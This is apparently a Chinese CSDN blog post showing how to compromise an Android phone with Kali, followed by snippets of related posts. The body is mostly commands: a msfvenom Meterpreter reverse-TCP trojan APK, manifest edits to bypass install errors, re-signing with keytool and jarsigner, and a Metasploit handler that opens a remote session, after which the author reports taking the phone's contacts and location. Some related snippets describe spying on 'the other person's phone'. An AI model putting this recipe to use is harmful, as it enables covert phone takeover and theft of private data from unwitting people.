kali完成一次android渗透测试

最新推荐文章于 2024-08-26 22:38:35 发布
最新推荐文章于 2024-08-26 22:38:35 发布
阅读量2.9k 收藏 64
点赞数 8
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51715176/article/details/130514366
版权

一、生成木马

1、利用kali自带的msf生成木马文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=5555 R > exp.apk 

 

 2、下载apk到手机安装

 

3、解决木马程序问题

①旧版本问题

手机为MIUI13,出现报错此应用专为旧版android打造(无截图)

查询资料后发现主要原因为SDK版本问题,反编译进行修改

在AdnroidManifest.xml文件<application>标签上方添加

<uses-sdk android:targetSdkVersion="23" android:minSdkVersion="16"/>

 重新编译,找到apk文件并改名

②重签名问题

下载后安装,报错103,需要重新签名 

 

重签名过程

1、生成签名证书

keytool -genkey -alias test -keyalg RSA -keystore mykey.jks

/*解释:keytool工具是Java JDK自带的证书工具

-genkey参数表示:要生成一个证书(版权、身份识别的安全证书)

-alias参数表示:证书别名 test

-keyalg RSA表示加密类型,RSA表示需要加密,以防止别人盗取

-keystore myKey.jks表示要生成的证书名称为myKey.jks

*/

2.重签名

jarsigner -verbose -keystore mykey.jks -signedjar exp-out.apk exp-change.apk test

四、渗透测试

1、开启msf

msfconsole

2、选定监听模块

use exploit/multi/handler

3、设置相关参数

set payload android/meterpreter/reverse_tcp

set lhost XX.XX.XX.XX

set lport XXXX

4、启动

run

 5、手机上点击app图标,开启应用,后台成功捕获目标

获取相关信息,成功渗透

 

其他相关指令请查看help

五、木马跑死

此时执行其他指令时出现超时等报错,原因为安卓设备未提供相关权限,或后台进程被杀死

 

  六、成功获取手机信息、通信录、地址

weixin_51715176
关注
渗透测试 --- 方法论
daibaohui的博客
02-21 1097
渗透测试(penetration testing,pentest)是实施安全评估(即审计)的具体手段。方法论是在制定、实施信息安全审计方案时,需要遵循的规则、惯例和过程。人们在评估网络、应用、系统或三者组合的安全状况时,不断摸索各种务实的理念和成熟的做法,并总结出了一套理论——测试方法论。本章简要介绍了渗透测试方法论的各关键要点,涉及的主题包括: ● 两种广为认知的渗透测试类型——黑盒测试和白盒测试; ● 漏洞评估和渗透测试的区别; ● 业界普遍采纳的安全测试方法论,以及其核心功能、特征和优势; ●
基于Android设备的Kali Linux渗透测试基础
08-02
基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程
Android手机安装Kali系统并配置ddns-go
最新发布
衡水铁头哥的博客
08-26 788
正文共:777 字 15 图,预估阅读时间:1 分钟前面我们介绍了如果在Linux系统使用ddns-go实现IPv6地址的自动解析(使用ddns-go实现自动配置IPv6的DDNS),但在日常使用中,如果使用服务器开虚机的方式(准备搞OpenStack了,先装一台最新的Ubuntu 23.10),电费太高;即使是电脑安装成Linux系统(笔记本电脑安装CentOS),还是不太方便。有没有什么低成本...
Msf--控制 Android手机
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
08-02 1288
|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lh...
kali渗透安卓手机
weixin_43893278的博客
04-23 1万+
kali渗透安卓手机 1.打开kali,获取ip地址 ip地址为192.168.242.145 2.打开小米球或者sunny 3.使用msfvenom生成apk sudo msfvenom -a java -platform android -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.242.145 LPORT=8888 -o payload.apk 4.将生成的payload.apk传入手机中 5.运行msfconsole
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 6061
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2305
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
android-pentest-tool:适用于Kali Linux的Android渗透测试工具
05-01
专为kali linux设计 javaFX + Spring boot + bash脚本 一键完成所有常规步骤 更新 1.0版发布了! 建造 mvn clean package 跑步 java -jar target/android-pentest-tool*.jar 去做: 添加安装步骤 添加功能列表 更...
基于Android设备的Kali Linux渗透测试教程1
06-13
本文档是一份关于在Android设备上实施Kali Linux渗透测试的教程。Kali Linux是一种专为安全专业人员设计操作系统,用于渗透测试、计算机取证等安全相关任务。本教程的核心内容包括在Android设备上安装和配置Kali ...
Kali Linux在Android渗透测试中的自动化脚本编写】:提高效率的秘诀
Kali Linux与Android渗透测试概述 随着数字时代的迅速发展,信息安全变得越来越重要。在网络安全的众多分支中,渗透测试扮演着至关重要的角色。Kali Linux和Android作为渗透测试者青睐的操作系统,提供了强大的...
kali for android让你的安卓设备跑起kali.docx
08-20
Kali for Android 是一种将 Kali 系统安装到安卓设备上的解决方案,将安卓设备变成渗透测试小钢炮。以下是实现 Kali for Android 的详细步骤和知识点: 一、前提条件 * 安卓设备已经获取了 root 权限 * 安卓设备...
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
热门推荐
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1845
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 875
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Kali入侵Android系统
2301_77994635的博客
11-17 1335
三、将test.apk上传至攻击目标并启动。test.apk 生成的可执行木马文件名。1.选择multi/handler模块。3.设置lhost和lport(同上)2.设置payload(和上面一样)app_list 查看安装的app。ipconfig 查看网络配置信息。成功msf成功建立session。sysinfo 系统信息。lhost 本机ip。lport 监听端口。四、窥探目标环境信息。
使用kali安卓手机进行渗透测试
lxy123_com的博客
02-12 2万+
实验环境:Kali虚拟机一台,4G运行,IP地址192.168.0.105;安卓手机一部,建议使用不用的破手机 实验目的:对安卓机进行攻击测试 实验步骤: (一),配置卡里环境 1,kali配置网络 ┌──(root????kali)-[~] └─#ifconfig 查看kali本机IP地址 eth0: flags=4
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1091
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
简单的渗透(远程反向控制)——kali linux操控Android系统
m0_56451748的博客
11-23 3305
简单的远程反向控制
Kali Linux中进行Android渗透测试教程
"Android 渗透测试 入门 教程" ...这篇内容是针对初学者的Android渗透测试入门教程,不仅教授如何检查和使用Android SDK,还引导读者了解和准备渗透测试环境,特别是使用Kali Linux这个强大的平台。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值